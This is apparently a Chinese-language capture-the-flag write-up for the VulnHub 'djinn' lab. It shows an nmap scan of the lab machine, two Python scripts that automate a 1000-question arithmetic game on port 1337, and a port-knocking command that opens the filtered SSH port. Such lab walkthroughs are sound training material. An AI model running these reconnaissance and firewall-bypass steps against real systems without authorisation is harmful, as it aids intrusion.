djinn 1:针对1337端口的自动化脚本

• djinn.ova (Size: 1.9 GB)
• Download: https://drive.google.com/file/d/1LlT5JcdlyDUcvkn12t9oIIFo0X9Gt53B/view?usp=sharing
• Download (Mirror): https://download.vulnhub.com/djinn/djinn.ova

先拿nmap扫一下，可以看见22端口是被过滤的 

└─# nmap -sV -p- -A -O 192.168.68.217
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-17 04:46 EST
Nmap scan report for djinn.lan (192.168.68.217)
Host is up (0.00030s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.68.104
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   filtered ssh
1337/tcp open     waste?
| fingerprint-strings: 
|   NULL: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '/', 1)
|   RPCCheck: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '/', 7)
7331/tcp open     http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+

我们在1337端口进行尝试 

 

 如图，该端口要求我们做1000次算术题。。。。

考虑使用socket实现自动化，exp v0.0.1：

import socket
import time
client=socket.socket(family=socket.AF_INET,type=socket.SOCK_STREAM)
client.connect(('192.168.68.217',1337)) #Here to change the ip and port
b=client.recv(4096)
def result(a,b,c):
    if c=="+":
        return a+b
    elif c=="-":
        return a-b
    elif c=="*":
        return a*b
    elif c=="/":
        return a/b
i=0
while True:
    byte = client.recv(4096)
    content=byte.decode(encoding="UTF-8")
    content=content.split("(")[1]
    a=int(content[0])
    operate=content[4]
    b = int(content[8])
    # print(content)
    print(a,operate,b)
    rsl = (str(result(a,b,operate))+"\n").encode(encoding="UTF-8")
    client.sendall(rsl)
    print(result(a,b,operate)," has sent,for ",i+1," in 1000\n")
    i+=1
    time.sleep(0.1)
    if (i==1001 ):
        break
content = client.recv(2048)
print(content.decode(encoding="UTF-8"))

当然，这个版本代码规范不太好说

第二天又用subprocess写了一个

exp v0.1:

import subprocess
import time, sys


def result(a, b, operate):
    if operate == "+":
        return a + b
    elif operate == "-":
        return a - b
    elif operate == "*":
        return a * b
    elif operate == "/":
        return a / b


def feedback():
    str1 = content.decode().strip().split("(")[1]
    a = int(str1[0])
    operate = str1[4]
    b = int(str1[8])
    # print(str1)
    print(a, operate, b)
    rsl = str(result(a, b, operate))
    print(rsl)
    proc.stdin.write((rsl + "\n").encode(encoding='UTF-8'))
    proc.stdin.flush()
    time.sleep(0.01)


print("__     ___ _    _ ",
      "\ \   / (_) | _(_)_ __ __ _ ",
      " \ \ / /| | |/ / | '__/ _` |",
      "  \ V / | |   <| | | | (_| |",
      "   \_/  |_|_|\_\_|_|  \__,_|",
      sep="\n"
      )

try:
    ip = str(sys.argv[1])
except IndexError:
    print("usage: python tel.py ip")
    exit(1)

proc = subprocess.Popen("nc " + ip + " 1337", shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdout=subprocess.PIPE)
time.sleep(0.01)
content = proc.stdout.readline()

while ", \'" not in content.decode("UTF-8"):
    content = proc.stdout.readline()
    print(content.decode().strip())
feedback()

for i in range(1000):
    content = proc.stdout.readline()
    feedback()
    print(i + 1, "in", 1000)

for i in range(3):
    content = proc.stdout.readline()
    print(content.decode().strip())

运行效果如图：

最后跑出来

 

 给了三个端口

1356，6784，3409

猜测是端口碰撞，抄一下wiki

什么是 Port Knocking | 端口碰撞 ？

端口碰撞是一种通过在一组预先指定的关闭端口上产生连接请求，从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列，防火墙规则就会被动态修改，以允许发送连接请求的主机通过特定端口进行连接。

端口碰撞的主要目的是防止攻击者通过进行端口扫描来扫描系统中潜在的可利用服务，因为除非攻击者发送正确的碰撞序列，否则受保护的端口将显示为关闭。

举个栗子：

例如在服务器上设置为：服务器接收到同一个用户的对端口2048、2049、2055、2058连接序列尝试后，则服务器打开TCP服务端口号28，该用户可以通过该端口进行远程工作，连接结束后自动关闭该服务端口。

所以我们

knock 192.168.68.217 1356 6784 3409 -v 

 依次敲击三个端口

此时之前被过滤的22端口打开了